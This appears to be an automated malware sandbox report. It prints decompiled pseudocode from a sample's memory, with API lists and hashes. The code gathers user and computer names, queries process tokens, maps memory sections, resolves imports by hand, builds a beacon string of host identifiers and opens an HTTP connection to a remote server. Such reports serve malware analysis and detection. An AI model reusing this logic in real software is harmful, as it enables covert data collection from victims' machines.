0x008c55ce
0x008c55ce
0x008c55a9
0x008c55d9
0x008c55db
0x008c55de
0x008c55e0
0x008c55e3
0x008c55e6
0x008c55f0
0x008c55f4
0x008c55f8

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 008C5523
RtlAllocateHeap.NTDLL(00000000,?), ref: 008C553A
GetUserNameW.ADVAPI32(00000000,?), ref: 008C5547
HeapFree.KERNEL32(00000000,00000000), ref: 008C5568
GetComputerNameW.KERNEL32(00000000,00000000), ref: 008C558F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 008C55A3
GetComputerNameW.KERNEL32(00000000,00000000), ref: 008C55B0
HeapFree.KERNEL32(00000000,00000000), ref: 008C55CE

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: ceae744d19c5afb5e1caafc105d12b30f8efce1cb4f4faac8e3075cb88d82134
Instruction ID: 517462229f593a2ce61cf409b58d17add12b7c585abf6e961786f7768b209bf6
Opcode Fuzzy Hash: ceae744d19c5afb5e1caafc105d12b30f8efce1cb4f4faac8e3075cb88d82134
Instruction Fuzzy Hash: 55311472A00609EFDB10DFA9DC85F6AB7FAFF48704F208469E505D6220EB70EE419B11

Uniqueness

Uniqueness Score: -1.00%

Function 008C737C Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E008C737C(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E008C7A71(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E008C789E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x008c7389
0x008c738a
0x008c738b
0x008c738c
0x008c738d
0x008c7391
0x008c7398
0x008c73a7
0x008c73aa
0x008c73ad
0x008c73b4
0x008c73b7
0x008c73ba
0x008c73bd
0x008c73c0
0x008c73cb
0x008c73cd
0x008c73d6
0x008c73de
0x008c73e0
0x008c73f2
0x008c73fc
0x008c7400
0x008c740f
0x008c7413
0x008c741c
0x008c7424
0x008c7424
0x008c7426
0x008c7426
0x008c742e
0x008c7434
0x008c7438
0x008c7438
0x008c7443

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 008C73C3
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 008C73D6
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 008C73F2

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 008C740F
memcpy.NTDLL(?,00000000,0000001C), ref: 008C741C
NtClose.NTDLL(?), ref: 008C742E
NtClose.NTDLL(00000000), ref: 008C7438

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: dc533c64f86856a7951998850b67876e09e827f74a624148762044907e598a77
Instruction ID: bf9c572fdd348ff6d1f0fa99cae778368fa91328f5b46b354e38c5d702fa63aa
Opcode Fuzzy Hash: dc533c64f86856a7951998850b67876e09e827f74a624148762044907e598a77
Instruction Fuzzy Hash: 7321F472900228BBDB019FA9CC89EDEBFBDFB08750F104066F905E6120D7719A449FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401D95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401D95(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401F78(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401d9e
0x00401da5
0x00401da6
0x00401da7
0x00401da8
0x00401da9
0x00401dba
0x00401dbe
0x00401dd2
0x00401dd5
0x00401dd8
0x00401ddf
0x00401de2
0x00401de9
0x00401dec
0x00401def
0x00401df2
0x00401df7
0x00401e32
0x00401df9
0x00401dfc
0x00401e02
0x00401e07
0x00401e0b
0x00401e29
0x00401e0d
0x00401e14
0x00401e22
0x00401e22
0x00401e0b
0x00401e3a

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2

Part of subcall function 00401F78: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5

memset.NTDLL ref: 00401E14

Strings

@, xrefs: 00401DE2

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
Instruction ID: 51ff91b96694bad68c08ba82d5134d0fe6a1f199b3c348713c8e4c0aaae189fe
Opcode Fuzzy Hash: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
Instruction Fuzzy Hash: A8211DB5D00209AFCB11DFA9C8849DFFBB9EF48354F10443AE505F7260D7349A458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040134F Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040134F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x0040134f
0x00401358
0x0040135d
0x00401363
0x0040136c
0x00401372
0x00401374
0x00401377
0x0040137c
0x00401383
0x00401383
0x00401387
0x0040138d
0x00401392
0x00000000
0x00000000
0x00401398
0x004013a2
0x004013a4
0x004013a7
0x004013aa
0x004013ae
0x004013b6
0x004013b8
0x004013bb
0x00401423
0x00401423
0x00401427
0x00000000
0x00000000
0x004013c0
0x004013c6
0x004013c8
0x004013db
0x004013de
0x004013de
0x004013de
0x004013e2
0x004013ca
0x004013ca
0x004013d2
0x004013d4
0x00000000
0x00000000
0x00000000
0x00000000
0x004013d4
0x004013c2
0x004013c2
0x004013d6
0x004013d6
0x004013d6
0x004013e5
0x004013e8
0x004013ea
0x004013f1
0x004013ec
0x004013ec
0x004013ec
0x004013f9
0x004013ff
0x00401401
0x00401431
0x00401403
0x00401403
0x00401406
0x00401408
0x00401410
0x00401410
0x00401415
0x00401417
0x0040141e
0x00401420
0x00401420
0x00401420
0x00000000
0x00401420
0x00000000
0x00401401
0x004013b0
0x004013b0
0x004013b4
0x00000000
0x00000000
0x004013b4
0x00401434
0x00401434
0x0040143b
0x00401440
0x00000000
0x00000000
0x00401446
0x00401451
0x00000000
0x00401451
0x00401448
0x00401448
0x0040144e
0x00000000
0x0040144e
0x0040137c
0x00401452
0x00401457

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
GetProcAddress.KERNEL32(?,00000000), ref: 004013F9

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
Instruction ID: a8434760b72dced533d6b1e45b9ae802b84f7c41c3403426f2e3ea1f70bc4997
Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
Instruction Fuzzy Hash: A0310775A0121ADBDB14CF59C994AAEB7F4FF04310F24407AD902EB3A0E778EA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401F78 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401F78(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401f8a
0x00401f90
0x00401f9e
0x00401fa5
0x00401faa
0x00401fb0
0x00000000
0x00401fb1
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: c55f902479581699a0c324a5f7b4548b03dce4ae1f92d5d63f21deca0fc447f7
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: B3F012B590420DBFDB119FA5CC85C9FBBBDEB44394B104A3AB552E11A0D6309E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 008C3643 Relevance: 37.7, APIs: 25, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E008C3643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x8ca3e0; // 0x1309cf8
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x8ca2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x8ca018; // 0x1228dd1
					asm("bswap eax");
					_t34 =  *0x8ca014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x8ca010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x8ca00c; // 0xeec43f25
					asm("bswap eax");
					_t37 =  *0x8ca348; // 0xa3d5a8
					_t3 = _t37 + 0x8cb62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x8ca02c,  *0x8ca004, _t112);
					_t40 = E008C1308();
					_t41 =  *0x8ca348; // 0xa3d5a8
					_t4 = _t41 + 0x8cb66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x8ca348; // 0xa3d5a8
						_t8 = _t93 + 0x8cb676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x8ca348; // 0xa3d5a8
					_t10 = _t45 + 0x8cb2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E008C3DE0(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x8ca348; // 0xa3d5a8
						_t12 = _t88 + 0x8cb8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x8ca2d8, 0, _t105);
					}
					_t106 = E008C3ACA();
					if(_t106 != 0) {
						_t83 =  *0x8ca348; // 0xa3d5a8
						_t14 = _t83 + 0x8cb8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x8ca2d8, 0, _t106);
					}
					_t107 =  *0x8ca3cc; // 0x1309600
					_a20 = E008C4B69(0x8ca00a, _t107 + 4);
					_t53 =  *0x8ca36c; // 0x13095b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x8ca348; // 0xa3d5a8
						_t17 = _t80 + 0x8cb889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x8ca2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E008C53AE(GetTickCount());
							_t59 =  *0x8ca3cc; // 0x1309600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x8ca3cc; // 0x1309600
							__imp__(_t63 + 0x40);
							_t65 =  *0x8ca3cc; // 0x1309600
							_t66 = E008C2281(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x8c9280);
								_push(_t119);
								_t71 = E008C6311();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E008C5D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E008C14C6();
									}
									HeapFree( *0x8ca2d8, 0, _v48);
									_t109 = 0;
								}
								RtlFreeHeap( *0x8ca2d8, _t109, _t119); // executed
							}
							RtlFreeHeap( *0x8ca2d8, _t109, _t116); // executed
						}
						HeapFree( *0x8ca2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x8ca2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x008c3643
0x008c3643
0x008c3643
0x008c3658
0x008c365a
0x008c365f
0x008c3663
0x008c366b
0x008c3671
0x008c3675
0x008c367d
0x008c3685
0x008c3685
0x008c3687
0x008c3693
0x008c36a2
0x008c36a7
0x008c36aa
0x008c36af
0x008c36b2
0x008c36b7
0x008c36ba
0x008c36c6
0x008c36d3
0x008c36d5
0x008c36db
0x008c36e0
0x008c36eb
0x008c36ed
0x008c36f0
0x008c36f6
0x008c36f8
0x008c3701
0x008c370c
0x008c370e
0x008c3711
0x008c3711
0x008c3713
0x008c3718
0x008c3724
0x008c3726
0x008c3729
0x008c372b
0x008c3730
0x008c3734
0x008c3736
0x008c373b
0x008c3747
0x008c3749
0x008c3755
0x008c3757
0x008c3757
0x008c3762
0x008c3766
0x008c3768
0x008c376d
0x008c3779
0x008c377b
0x008c3787
0x008c3789
0x008c3789
0x008c378f
0x008c37a2
0x008c37a6
0x008c37ab
0x008c37af
0x008c37b2
0x008c37b7
0x008c37c1
0x008c37c3
0x008c37ca
0x008c37e2
0x008c37e6
0x008c37f2
0x008c37f7
0x008c3800
0x008c3811
0x008c3815
0x008c381e
0x008c3824
0x008c382c
0x008c3831
0x008c383e
0x008c3844
0x008c3850
0x008c3856
0x008c3857
0x008c385c
0x008c3862
0x008c3868
0x008c386f
0x008c3876
0x008c387c
0x008c3883
0x008c3887
0x008c3892
0x008c3897
0x008c389d
0x008c38a6
0x008c38a6
0x008c38b7
0x008c38bd
0x008c38bd
0x008c38c7
0x008c38c7
0x008c38d5
0x008c38d5
0x008c38e6
0x008c38e6
0x008c38f4
0x008c38f4
0x008c3905

APIs

RtlAllocateHeap.NTDLL ref: 008C366B
GetTickCount.KERNEL32 ref: 008C367F
wsprintfA.USER32 ref: 008C36CE
wsprintfA.USER32 ref: 008C36EB
wsprintfA.USER32 ref: 008C370C
wsprintfA.USER32 ref: 008C3724
wsprintfA.USER32 ref: 008C3747
HeapFree.KERNEL32(00000000,00000000), ref: 008C3757
wsprintfA.USER32 ref: 008C3779
HeapFree.KERNEL32(00000000,00000000), ref: 008C3789
wsprintfA.USER32 ref: 008C37C1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 008C37DC
GetTickCount.KERNEL32 ref: 008C37EC
RtlEnterCriticalSection.NTDLL(013095C0), ref: 008C3800
RtlLeaveCriticalSection.NTDLL(013095C0), ref: 008C381E

Part of subcall function 008C2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22AC
Part of subcall function 008C2281: lstrlen.KERNEL32(00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22B4
Part of subcall function 008C2281: strcpy.NTDLL ref: 008C22CB
Part of subcall function 008C2281: lstrcat.KERNEL32(00000000,00000000), ref: 008C22D6
Part of subcall function 008C2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C22F3

StrTrimA.SHLWAPI(00000000,008C9280,00000000,01309600), ref: 008C3850

Part of subcall function 008C6311: lstrlen.KERNEL32(01309CE0,00000000,00000000,00000000,008C385C,00000000), ref: 008C6321
Part of subcall function 008C6311: lstrlen.KERNEL32(?), ref: 008C6329
Part of subcall function 008C6311: lstrcpy.KERNEL32(00000000,01309CE0), ref: 008C633D
Part of subcall function 008C6311: lstrcat.KERNEL32(00000000,?), ref: 008C6348

lstrcpy.KERNEL32(00000000,?), ref: 008C386F
lstrcpy.KERNEL32(00000000,?), ref: 008C3876
lstrcat.KERNEL32(00000000,?), ref: 008C3883
lstrcat.KERNEL32(00000000,00000000), ref: 008C3887

Part of subcall function 008C5D05: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C5DB7

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 008C38B7
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 008C38C7
RtlFreeHeap.NTDLL(00000000,00000000,00000000,01309600), ref: 008C38D5
HeapFree.KERNEL32(00000000,?), ref: 008C38E6
RtlFreeHeap.NTDLL(00000000,00000000), ref: 008C38F4

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 186568778-0
Opcode ID: fd179e5464df3016b0cc72f8662d0819a54f6ccf78df70068a370e259131e8a5
Instruction ID: 70ebb7c71c2ae30580244b6498dea75d114b702bd08cfc285932eb59e26bb7bf
Opcode Fuzzy Hash: fd179e5464df3016b0cc72f8662d0819a54f6ccf78df70068a370e259131e8a5
Instruction Fuzzy Hash: B371B071500618EFC725ABA8EC4DE5B3BF8FB88708B050568F949D3231E732E905DB66

Uniqueness

Uniqueness Score: -1.00%

Function 008C7B59 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E008C7B59(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E008C7A71(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E008C789E(_t56);
					} else {
						E008C789E( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E008C7AEE) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E008C2129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x8ca348; // 0xa3d5a8
						_t15 = _t59 + 0x8cb73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
